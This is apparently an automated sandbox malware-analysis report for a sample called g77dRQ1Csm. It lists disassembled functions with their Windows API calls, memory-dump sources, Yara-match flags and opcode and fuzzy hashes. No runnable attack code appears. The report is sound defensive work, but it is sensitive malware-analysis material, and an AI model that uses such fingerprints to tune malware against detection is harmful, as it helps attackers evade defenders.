Uniqueness Score: -1.00%

Function 004201F6 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 00420268

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 03170A05 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,031707A3,00000000,00000000,?), ref: 03170A31

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 04ecd8d6e6be9fa4e317ddfa5000c4d5f120dcf4e52eab6da7e8714702a9d051
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: D2F0F436A10316AFDB28DA648C05BBAB778EB4C754F1D0469ED09A3140EBB5BE45C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 0042079E Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 031707D3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE

Part of subcall function 03166F80: _free.LIBCMT ref: 03166FDF
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 03170829

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction ID: 5a3c00381ec82938f5ac5077183bb761d3d1785f87e582802bca49da30d65b42
Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction Fuzzy Hash: 11F0A436A51319ABDB14EB64DC51EBA73BCDB4C310F0501B9E906DB240DB74AD4587D4

Uniqueness

Uniqueness Score: -1.00%

Function 031704F8 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 03170544

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: 2e29a0d9f272d9bfedd7fdfd3da37e9fbf05fca379e94df1a85af4eadd4fac9b
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 4DF0C8763003055FDB24DF799C9067A7BA5EF8879CF1944ADF9468B540D7B1D841CA40

Uniqueness

Uniqueness Score: -1.00%

Function 00420291 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 004202DD

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14

Uniqueness

Uniqueness Score: -1.00%

Function 0316774B Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,03164002,?,00000004), ref: 0316779E

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction ID: 028d06f381818c41a243314780d76b1850f281503ef7fc1de486a5d89bd1495c
Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction Fuzzy Hash: D4F06D31741718BBDB11EFA0EC05F7E7B66EB08B11F900179BC096A290CB714A249699

Uniqueness

Uniqueness Score: -1.00%

Function 03167358 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 03161C62: RtlEnterCriticalSection.NTDLL(?), ref: 03161C71

EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 03167390

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: 5c4505cb81ab221e61d82363797bd753295a1a525ac1bc094ebb2b4504be66eb
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: AAF03C36A50304EFDB14EF78DC45B5D7BB0EB08714F10516AF914DF2A0CB7499548B8A

Uniqueness

Uniqueness Score: -1.00%

Function 004170F1 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A

EnumSystemLocalesW.KERNEL32(Function_000170AB,00000001,00438F98,0000000C), ref: 00417129

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49

Uniqueness

Uniqueness Score: -1.00%

Function 03170412 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 03170449

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: a88acf016352d585060b328abc67a9a6808031f464af418180b3d5d274505e3e
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: 44F0553A30031557CB08EF3ADC0577ABFA8EFC9714B4A409EEE0A8B240C7729842C790

Uniqueness

Uniqueness Score: -1.00%

Function 004201AB Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 004201E2

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754

Uniqueness

Uniqueness Score: -1.00%

Function 03159E6D Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409C12,031595DF), ref: 03159E72

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00409C06 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0315F6A8 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0315F818

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 25c077257de7c9d719600d2131ba124d950fe9782468e3d3375a5f5ff1def40a
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: BF515765600749D7DB38CB788598BBFA79A9F0E200F5C091AFDB2CF295C705E9878352

Uniqueness

Uniqueness Score: -1.00%

Function 0040F441 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0040F5B1

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E

Uniqueness

Uniqueness Score: -1.00%

Function 00420AEA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00420AEA

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE39 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction ID: d4ebaa65498674ec5fd033f868b33b9562cf8a9fc909dcd3fe82be6bf65502bb
Opcode Fuzzy Hash: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction Fuzzy Hash: 6F321332E69F014DD7239634CC62376A259AFB73C4F55D737E81AB5AA5EB28C4C34108

Uniqueness

Uniqueness Score: -1.00%

Function 0315C3F8 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: e45592b676ab25333cd61dceb0c1cce5cadf9a8d66ea78a6e2826f0208d371ce
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 3B9135722092A28BDB2DCB7A857447EFEE15A453A170E179EF8F3CA1C1EF14C154D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0040C191 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 5975a2af078c28816f01fe1301a8b7dceccd13c1e98c5dc0dc8573345ea9f6ce
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 219186722180A38AD72D437984B403FFFE15A513A131A07BFD4F2DA6C1EE38C555A628

Uniqueness

Uniqueness Score: -1.00%

Function 0315C6B3 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 71d193257b6c40191d5e784b73a73b00b144a0897522cfb48bfe6dc32a972344
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 319173761092A38BDB29CB3E857403DFFE15A463A170E079EF8F2CA1C1EF148154D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0040C44C Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 21e6ce72fb18376f8c9c0177a15a08f5feb8af2f21d081aaa92a013857dedb9e
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 0F9179761080A38ADB29473985B403FFFE15A523A131A0BBFD4F2DB2C5EE38D555E624

Uniqueness

Uniqueness Score: -1.00%

Function 0315C131 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d28fe8928e5e2cdb403f3b30dfbcba5a9a60953aec65370b2bffc76b76a26741
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 029145721092A3CBDB6D8B7E94B403DFEE15A593A170E079DF8F3CA1D1EF14815496A0

Uniqueness

Uniqueness Score: -1.00%

Function 0040BECA Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 69778eac300dd1c10c594cbe57f4f6eadb7335fd5fb69c830af9f3d407440417
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 3F9158722080A389D729477D897447FFFE19A513A131A07BFD4F2DB2C1EE388554DA68

Uniqueness

Uniqueness Score: -1.00%

Function 0315BE87 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 1d29946cea012790a461047da0148e36e24f40734e5a3d1ac2a295d5d80df8cf
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 1D81417720D1A38BDB2DCB7A857403EFFE55A462A170E479EF8F2CA1C1EF2481549660

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC20 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 2607aabaea6df519b2dd372ead2d1238015a119bad60f1980fa744d4abdc4045
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: D38186722080A34AEB294639847447FFFE1DE513A131A07BFD4F2DA2C1EF38855596AC

Uniqueness

Uniqueness Score: -1.00%

Function 02F6766B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F67000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f67000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: edb88f2368ddfd72bbcaf34dff01b6499f2ab79ebee913e77830779b783b38c1
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: EE1182723401019FD744DF59DC84FA6B3EAEB89264B198165EE04CB316D676E841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03150D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 0d11079192f3a73462b098d4975cc356ad881efe34aaec6745bc2976de329111
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: B201A776A00604CFDF21CFA4CC14BAA73E9EB8D315F5944E5ED1697241E774A9418F90

Uniqueness

Uniqueness Score: -1.00%

Function 031621D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03162241
_free.LIBCMT ref: 03162257
_free.LIBCMT ref: 03162268
_free.LIBCMT ref: 03162279
_free.LIBCMT ref: 03162290
GetCPInfo.KERNEL32(?,?), ref: 031622D8

Part of subcall function 0316B3B5: _free.LIBCMT ref: 0316B420

_free.LIBCMT ref: 03162484
_free.LIBCMT ref: 03162497
_free.LIBCMT ref: 031624A5
_free.LIBCMT ref: 031624B0
_free.LIBCMT ref: 031624F2
_free.LIBCMT ref: 031624FA
_free.LIBCMT ref: 03162502
_free.LIBCMT ref: 0316250A
_free.LIBCMT ref: 03162518

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction ID: 205780c084bb2497aed94199218cba20536fa9be7fade5fa8444e2e52dca11da
Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction Fuzzy Hash: ACB18E719003059FDB21DFA9C880BEEBBF5BF0C304F18446DE995AB241DB76A852CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00411FDA
_free.LIBCMT ref: 00411FF0
